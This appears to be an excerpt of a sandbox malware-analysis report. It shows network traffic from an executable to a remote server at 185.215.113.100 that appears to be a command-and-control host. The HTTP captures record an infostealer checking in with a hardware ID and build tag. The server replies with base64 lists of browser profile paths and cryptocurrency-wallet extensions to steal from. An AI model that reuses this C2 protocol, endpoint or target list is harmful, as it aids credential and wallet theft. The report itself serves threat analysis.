Sep 1, 2024 23:03:52.665951967 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.748595953 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.748605967 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.748800993 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.831178904 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.831207037 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.831240892 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.831265926 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.864442110 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.864453077 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.864463091 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.864499092 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.864562988 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:52.913834095 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.913842916 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:52.913889885 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.068656921 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.068675041 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.068758965 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.068780899 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.069686890 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.069710970 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.069720984 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.069739103 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.069756031 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.151360989 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.151371002 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.151654005 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.597429991 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.597441912 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.597507000 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.597593069 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.597656965 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.597667933 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.597682953 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.597692966 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.597700119 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.597732067 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:53.598366976 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:53.598406076 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.355526924 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.355582952 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.355664968 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.355700970 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.624131918 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.624145031 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.624161005 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.624203920 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.624203920 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.624216080 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.624243975 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.624243975 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.634573936 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.634618044 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.635145903 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.635189056 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.768055916 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.768107891 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:54.768388987 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:54.768436909 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:55.245919943 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:55.245965958 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:55.245975971 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:55.245975018 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:55.246001959 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:55.246014118 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:55.425240040 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:55.425251007 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:55.425302982 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:55.507810116 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:55.507827044 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:55.507858038 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:55.507878065 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.276751995 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.276766062 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.276832104 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.276866913 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.479980946 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.480057001 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.480130911 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.480144024 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.480154037 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.480182886 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.480222940 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.688447952 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.688460112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.688520908 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.771167040 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.771218061 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:56.771223068 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:56.771261930 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.410744905 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.410758972 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.410767078 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.410840988 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.410840988 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.410870075 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.411025047 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.411035061 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.411089897 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.411089897 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.411163092 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.413240910 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.415945053 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.416202068 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.416510105 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.416521072 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:58.416564941 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:58.416564941 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:59.306395054 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:59.306408882 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:59.306420088 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:59.306435108 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:03:59.306577921 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:03:59.306579113 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:01.213459015 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:01.213526964 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:01.213598013 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:01.461019993 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:01.461035967 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:01.461047888 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:01.461087942 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:01.461119890 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:02.372721910 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.372736931 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.372783899 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:02.372826099 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:02.722450972 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.722465038 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.722484112 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.722496033 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.722507954 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.722518921 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:02.722560883 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:02.722666979 CEST	80	49730	185.215.113.100	192.168.2.4
Sep 1, 2024 23:04:02.722707033 CEST	49730	80	192.168.2.4	185.215.113.100
Sep 1, 2024 23:04:02.734956980 CEST	49730	80	192.168.2.4	185.215.113.100

HTTP Request Dependency Graph

185.215.113.100

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.100	80	2800	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 23:02:54.583930016 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 23:02:55.389348030 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 21:02:55 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 23:02:55.391875982 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 44 31 42 43 38 36 46 36 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"7BD1BC86F6713604296297------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"leva------JKEGHDGHCGHDHJKFBFBK--
Sep 1, 2024 23:02:55.694243908 CEST	407	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 21:02:55 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 7a 59 34 4f 54 64 6b 4f 44 6b 32 4d 6a 5a 68 4e 54 67 7a 59 7a 45 77 4d 32 52 6c 4d 32 51 31 4f 54 63 30 59 6d 49 31 59 6d 45 79 4d 44 59 30 4d 6d 4e 6d 4d 54 4a 6b 4d 54 64 6b 4e 7a 49 7a 59 6a 59 77 4e 7a 51 35 4f 47 51 77 5a 54 6b 34 4e 6a 55 30 4d 6a 63 31 4d 32 45 34 4d 6a 63 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MzY4OTdkODk2MjZhNTgzYzEwM2RlM2Q1OTc0YmI1YmEyMDY0MmNmMTJkMTdkNzIzYjYwNzQ5OGQwZTk4NjU0Mjc1M2E4Mjc1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 1, 2024 23:02:55.695233107 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCB Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="message"browsers------BAFCFBAEGDHIEBFHDGCB--
Sep 1, 2024 23:02:55.982058048 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 21:02:55 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 1, 2024 23:02:55.982109070 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 1, 2024 23:02:55.983489990 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ Host: 185.215.113.100 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"plugins------KKFCFBKFCFBFIDGCGDHJ--
Sep 1, 2024 23:02:56.268379927 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 21:02:56 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 1, 2024 23:02:56.268434048 CEST	164	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
Sep 1, 2024 23:02:56.268445015 CEST	1236	IN	Data Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
